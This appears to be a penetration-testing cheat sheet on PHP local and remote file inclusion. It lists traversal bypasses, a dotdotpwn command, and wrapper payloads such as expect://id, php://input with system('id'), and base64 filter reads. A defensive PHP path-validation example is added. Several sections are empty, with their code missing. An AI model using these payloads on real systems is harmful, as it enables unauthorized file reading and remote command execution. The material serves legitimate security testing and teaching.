php wrappers, LFI

Note: dotdotpwn is preinstalled in the latest Kali ISO. It works for HTTP, FTP and TFTP.

dotdotpwn -h IP -m MODE -f FILE-TO-FUZZ -U USER -P PASS

Workarounds

NOTE: Read the file that is running LFI to get more information about the code.

  • Bypassing filters using ....//

  • Using null byte %00: /etc/passwd%00

  • URL encoding techniques (double encoding)

LFI wordlist

  • /usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest.txt

.php wrappers

# protocol wrapper
file=http://IP/
file=ftp://IP/
file=//IP/smb-share/file

# expect wrapper
# allows running system commands
file=expect://id

# input wrapper
file=php://input
# needs to send POST data
<?php system('id'); ?> | <?php shell_exec('id'); ?>

# filter wrappers
file=php://filter/resource=PHP-FILE
file=php://filter/read=string.rot13/resource=PHP-FILE
file=php://filter/convert.base64-encode/resource=PHP-FILE

LFI to RCE (linux)

LFI Paths (linux)

LFI Paths (windows)

LFI PHP Code Analysis

The above code block includes any value given to the file parameter.

The above code block includes any value given to the file parameter as long as it is in the downloads directory. To bypass use ../../../<>

The above code block includes any value given to the file parameter as long as it is in the downloads directory, and appends .php to the user input value. To bypass use ../../../<> and a value ending with %00.

When the code substitutes ../ out of the input, bypass using ....// as it will convert to ../ after the substitution.
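For the defensive side of the cases above, here is an added example (not the page's original code) that puts the single-pass ../ substitution next to an include lookup that resolves the path and checks it stays inside the base directory. The function names, the downloads directory layout and the sample inputs are assumptions constructed for illustration.

```php
<?php
// Added example, not the page's code. Function names and the "downloads"
// base directory are assumptions for illustration.

// Weak filter from the text: a single str_replace pass over "../".
function weak_filter(string $file): string
{
    return str_replace('../', '', $file);
}

// Hardened lookup: resolve $file under $baseDir, or return null.
function resolve_download(string $baseDir, string $file): ?string
{
    // Reject NUL bytes and wrapper/URL-style values (php://, http://, ...).
    if (strpos($file, "\0") !== false || strpos($file, '://') !== false) {
        return null;
    }
    $base = realpath($baseDir);
    // realpath() collapses ../ and symlinks; false means no such file.
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $file . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    // The resolved path must still sit below the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed sample layout in a temporary directory.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . getmypid();
mkdir($root . '/downloads', 0700, true);
file_put_contents($root . '/downloads/report.php', "<?php echo 'report';");
file_put_contents($root . '/secret.php', "<?php echo 'secret';");

// The single pass rebuilds "../" from "....//", so the output still traverses.
echo 'weak_filter: ', weak_filter('....//....//secret'), PHP_EOL;

// Constructed inputs: one legitimate name, three traversal/wrapper attempts.
foreach (['report', '../secret', '....//secret', 'php://filter/resource=report'] as $in) {
    $out = resolve_download($root . '/downloads', $in);
    echo str_pad($in, 30), $out === null ? 'rejected' : 'allowed', PHP_EOL;
}

// Clean up the sample files.
unlink($root . '/downloads/report.php');
unlink($root . '/secret.php');
rmdir($root . '/downloads');
rmdir($root);
```

Mapping the parameter to a fixed allowlist of file names is stricter still, since user input then never reaches the path at all.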

RFI PHP Code Analysis

RFI requires both allow_url_fopen and allow_url_include to be enabled.
